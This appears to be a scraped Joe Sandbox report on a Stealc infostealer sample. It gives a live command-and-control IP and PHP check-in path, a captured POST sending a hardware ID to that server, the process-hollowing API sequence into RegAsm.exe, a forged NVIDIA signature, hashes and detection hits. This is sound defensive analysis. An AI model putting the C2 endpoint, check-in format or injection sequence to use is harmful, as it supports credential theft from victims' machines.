          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://45.152.113.10/s100%Avira URL Cloudmalware
          http://45.152.113.10/92335b4816f77e90.phpO100%Avira URL Cloudmalware
          http://aia.entrust.net/ts1-chain256.cer010%Avira URL Cloudsafe
          http://ocsp.entrust.net030%Avira URL Cloudsafe
          http://45.152.113.10/92335b4816f77e90.phpX100%Avira URL Cloudmalware
          http://45.152.113.10/92335b4816f77e90.php100%Avira URL Cloudmalware
          http://45.152.113.10100%Avira URL Cloudmalware
          http://45.152.113.10qMW0%Avira URL Cloudsafe
          http://www.entrust.net/rpa030%Avira URL Cloudsafe
          http://ocsp.entrust.net020%Avira URL Cloudsafe
          http://crl.entrust.net/ts1ca.crl00%Avira URL Cloudsafe
          http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
          https://www.entrust.net/rpa00%Avira URL Cloudsafe
          http://45.152.113.10/92335b4816f77e90.phpg100%Avira URL Cloudmalware
          http://45.152.113.10o0%Avira URL Cloudsafe
          http://45.152.113.10/100%Avira URL Cloudmalware
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://45.152.113.10/92335b4816f77e90.phptrue
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://45.152.113.10/92335b4816f77e90.phpORegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/sRegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ocsp.entrust.net03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.entrust.net02file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://www.entrust.net/rpa03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/92335b4816f77e90.phpXRegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10qMWRegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://aia.entrust.net/ts1-chain256.cer01file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://crl.entrust.net/ts1ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/92335b4816f77e90.phpgRegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://crl.entrust.net/2048ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10oRegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.entrust.net/rpa0file.exefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          45.152.113.10
          unknownRussian Federation
          138576CODECCLOUD-AS-APCodecCloudHKLimitedHKtrue
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1508881
          Start date and time:2024-09-10 20:10:06 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 7s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@6/1@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 22
          • Number of non-executed functions: 18
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          45.152.113.10file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CODECCLOUD-AS-APCodecCloudHKLimitedHKfile.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          CVE-2024-38143 poc.exeGet hashmaliciousCodoso Ghost, UACMeBrowse
          • 38.147.172.126
          No context
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):226
          Entropy (8bit):5.360398796477698
          Encrypted:false
          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
          MD5:3A8957C6382192B71471BD14359D0B12
          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
          Malicious:true
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.97500097478553
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:210'472 bytes
          MD5:21617215ffe926fd76b00a8b2f3a28c7
          SHA1:bb381ae78ca1c46db897add5b0da046515985692
          SHA256:3b79a6f501554bc68d204d6b0b7ea80cc1619d9dd0ffebb6933edc3e9b8f29ac
          SHA512:6cbc1d314e206c45ce9c15f0c37344ae444c4ccfe1c79d1eeae6aa122ba9a2c77c11c926d0a5f860eacaef31d03518f28553b68f44b34dd704c39b3a284aae1e
          SSDEEP:3072:utjx0IjyV4+F/0UlDMHIxXh1RLsT9I911w84MtRqdT9P1lThq9fZpYU7cCYfJkZS:suIujssD4I7911w8pReHg9fZpBQLhxEO
          TLSH:DF2412161BA65633EEAC9E34B4F1D7649E64F7AA9CD3450A1B20D823DBC4F383E14274
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.f............................^%... ...@....@.. ....................................`................................
          Icon Hash:90cececece8e8eb0
          Entrypoint:0x43255e
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x66E07BD4 [Tue Sep 10 17:03:16 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Signature Valid:false
          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/01/2023 00:00:00 16/01/2026 23:59:59
          Subject Chain
          • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
          Version:3
          Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
          Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
          Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
          Serial:0997C56CAA59055394D9A9CDB8BEEB56
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x325100x4b.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x5d8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x310000x2628
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x323d80x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000x305640x30600cee7a7bfa90e6fa2e4d4defc5ae4ab11False0.9917534722222222data7.99198291222824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0x340000x5d80x600b1a8c2c35c9b92ec10e299af0a45eb6dFalse0.4381510416666667data4.1473038615233975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x360000xc0x200cc12ef0f3c0fbac92b8e76a40918fa2fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_VERSION0x340a00x344data0.4449760765550239
          RT_MANIFEST0x343e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
          DLLImport
          mscoree.dll_CorExeMain
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-09-10T20:11:02.328461+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973345.152.113.1080TCP
          TimestampSource PortDest PortSource IPDest IP
          Sep 10, 2024 20:11:01.660697937 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:01.665800095 CEST804973345.152.113.10192.168.2.4
          Sep 10, 2024 20:11:01.665884018 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:01.666017056 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:01.670967102 CEST804973345.152.113.10192.168.2.4
          Sep 10, 2024 20:11:02.185729027 CEST804973345.152.113.10192.168.2.4
          Sep 10, 2024 20:11:02.185782909 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:02.188321114 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:02.193656921 CEST804973345.152.113.10192.168.2.4
          Sep 10, 2024 20:11:02.328406096 CEST804973345.152.113.10192.168.2.4
          Sep 10, 2024 20:11:02.328460932 CEST4973380192.168.2.445.152.113.10
          Sep 10, 2024 20:11:03.556631088 CEST4973380192.168.2.445.152.113.10
          • 45.152.113.10
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.44973345.152.113.10807084C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          Sep 10, 2024 20:11:01.666017056 CEST88OUTGET / HTTP/1.1
          Host: 45.152.113.10
          Connection: Keep-Alive
          Cache-Control: no-cache
          Sep 10, 2024 20:11:02.185729027 CEST203INHTTP/1.1 200 OK
          Date: Tue, 10 Sep 2024 18:11:02 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Sep 10, 2024 20:11:02.188321114 CEST410OUTPOST /92335b4816f77e90.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
          Host: 45.152.113.10
          Content-Length: 210
          Connection: Keep-Alive
          Cache-Control: no-cache
          Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 38 31 38 30 30 45 46 35 34 39 31 35 38 34 32 36 35 39 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a
          Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="hwid"9081800EF5491584265921------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="build"cry------HIIIDAKKJJJKKECAKKJE--
          Sep 10, 2024 20:11:02.328406096 CEST210INHTTP/1.1 200 OK
          Date: Tue, 10 Sep 2024 18:11:02 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Data Raw: 59 6d 78 76 59 32 73 3d
          Data Ascii: YmxvY2s=


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:14:10:59
          Start date:10/09/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0xc40000
          File size:210'472 bytes
          MD5 hash:21617215FFE926FD76B00A8B2F3A28C7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:14:10:59
          Start date:10/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:14:11:00
          Start date:10/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x600000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:11:00
          Start date:10/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x10000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:36.7%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:18.6%
            Total number of Nodes:43
            Total number of Limit Nodes:1
            execution_graph 302 2dd0988 303 2dd099c 302->303 313 2dd04c4 303->313 306 2dd09c9 307 2dd0a0a 306->307 322 2dd04d0 306->322 309 2dd0ab7 FreeConsole 307->309 311 2dd0a18 307->311 310 2dd0ae3 309->310 314 2dd0a78 FreeConsole 313->314 316 2dd09b1 314->316 317 2dd0b42 316->317 320 2dd0b61 317->320 318 2dd0e13 VirtualProtectEx 319 2dd0e53 318->319 319->306 320->318 321 2dd0da5 320->321 321->306 323 2dd0dc8 VirtualProtectEx 322->323 325 2dd0e53 323->325 325->307 337 2dd0978 338 2dd099c 337->338 339 2dd04c4 FreeConsole 338->339 340 2dd09b1 339->340 347 2dd0b42 VirtualProtectEx 340->347 341 2dd0a0a 344 2dd0ab7 FreeConsole 341->344 346 2dd0a18 341->346 342 2dd09c9 342->341 343 2dd04d0 VirtualProtectEx 342->343 343->341 345 2dd0ae3 344->345 347->342 334 2f6276c 335 2f62707 Wow64SetThreadContext ResumeThread 334->335 336 2f6276f 334->336 326 2f6241d 329 2f62455 326->329 327 2f62563 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 328 2f62632 WriteProcessMemory 327->328 327->329 330 2f62677 328->330 329->327 331 2f62622 TerminateProcess 329->331 332 2f6267c WriteProcessMemory 330->332 333 2f626b9 WriteProcessMemory Wow64SetThreadContext ResumeThread 330->333 331->327 332->330 348 2dd04b0 349 2dd04b5 FreeConsole 348->349 351 2dd0ae3 349->351

            Callgraph

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F6238F,02F6237F), ref: 02F6258C
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F6259F
            • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 02F625BD
            • ReadProcessMemory.KERNELBASE(00000088,?,02F623D3,00000004,00000000), ref: 02F625E1
            • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 02F6260C
            • TerminateProcess.KERNELBASE(00000088,00000000), ref: 02F6262B
            • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 02F62664
            • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 02F626AF
            • WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 02F626ED
            • Wow64SetThreadContext.KERNEL32(0000008C,02F30000), ref: 02F62729
            • ResumeThread.KERNELBASE(0000008C), ref: 02F62738
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1699547094.0000000002F62000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F62000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2f62000_file.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
            • API String ID: 2440066154-1257834847
            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction ID: 057304f0620786ab837126966fb55f66a99174956c122b85ca891df3252c4d83
            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction Fuzzy Hash: 4FB1E67664024AAFDB60CF68CC80BEA77A5FF88714F158524EA0CAB341D774FA51CB94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 22 2f6276c-2f6276d 23 2f62707-2f6273b Wow64SetThreadContext ResumeThread 22->23 24 2f6276f 22->24
            APIs
            • Wow64SetThreadContext.KERNEL32(0000008C,02F30000), ref: 02F62729
            • ResumeThread.KERNELBASE(0000008C), ref: 02F62738
            Memory Dump Source
            • Source File: 00000000.00000002.1699547094.0000000002F62000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F62000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2f62000_file.jbxd
            Similarity
            • API ID: Thread$ContextResumeWow64
            • String ID:
            • API String ID: 1826235168-0
            • Opcode ID: 691b32745f13b943385fc8a0155c2a4f71dbbdd5f4f7e63c63a9669e7b5ab1ca
            • Instruction ID: 4b2654f6c8db04471d175c02e96270a09ab1c204cb6af77e9519ba8905c4b52d
            • Opcode Fuzzy Hash: 691b32745f13b943385fc8a0155c2a4f71dbbdd5f4f7e63c63a9669e7b5ab1ca
            • Instruction Fuzzy Hash: 43E0BDB6208A899BCB30CF99CCC0AE977A8BF8D320F400051EA0C8B612D3346B048B20

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 25 2dd0b42-2dd0b84 29 2dd0b86-2dd0b94 25->29 31 2dd0daf-2dd0e51 VirtualProtectEx 29->31 32 2dd0b9a-2dd0bba 29->32 38 2dd0e58-2dd0e6c 31->38 39 2dd0e53 31->39 32->31 33 2dd0bc0-2dd0bcb 32->33 33->31 34 2dd0bd1-2dd0bdc 33->34 34->29 37 2dd0bde-2dd0be3 34->37 40 2dd0be6-2dd0beb 37->40 39->38 40->31 41 2dd0bf1-2dd0bfe 40->41 41->31 42 2dd0c04-2dd0c10 41->42 43 2dd0c19-2dd0c1e 42->43 44 2dd0c12-2dd0c18 42->44 43->31 45 2dd0c24-2dd0c2b 43->45 44->43 45->31 46 2dd0c31-2dd0c37 45->46 46->31 47 2dd0c3d-2dd0c48 46->47 47->40 48 2dd0c4a-2dd0c59 47->48 49 2dd0c5f-2dd0c66 48->49 50 2dd0da5-2dd0dac 48->50 51 2dd0c68-2dd0c6f 49->51 52 2dd0c70-2dd0c78 49->52 51->52 52->31 53 2dd0c7e-2dd0c8a 52->53 54 2dd0c8c-2dd0c92 53->54 55 2dd0c93-2dd0c98 53->55 54->55 55->31 56 2dd0c9e-2dd0ca5 55->56 56->31 57 2dd0cab-2dd0cb1 56->57 57->31 58 2dd0cb7-2dd0ccd 57->58 59 2dd0ccf-2dd0cd6 58->59 60 2dd0cd7-2dd0d05 58->60 59->60 63 2dd0d14-2dd0d1e 60->63 64 2dd0d07-2dd0d0c 60->64 63->31 65 2dd0d24-2dd0d2d 63->65 64->63 65->31 66 2dd0d33-2dd0d52 65->66 67 2dd0d54-2dd0d59 66->67 68 2dd0d61-2dd0d6b 66->68 67->68 68->31 69 2dd0d6d-2dd0d72 68->69 69->31 70 2dd0d74-2dd0d9f 69->70 70->49 70->50
            APIs
            • VirtualProtectEx.KERNELBASE(?,03F63594,?,?,?,?,?,?,00000000,?,?,02DD0A0A,?,00000040,?), ref: 02DD0E44
            Memory Dump Source
            • Source File: 00000000.00000002.1699355208.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2dd0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 8b7d42248d1e73dcf39a35b7bff568916d4bba946543597fb91293eb63d3e289
            • Instruction ID: 2de1397f4914f540192f178fc71dfc02786e38255c91525bac459424938e22ff
            • Opcode Fuzzy Hash: 8b7d42248d1e73dcf39a35b7bff568916d4bba946543597fb91293eb63d3e289
            • Instruction Fuzzy Hash: A9A190709046558FCB11DFA9C4806ADFBF2FF89315F15859AD8A9AB356C335EC40CBA0

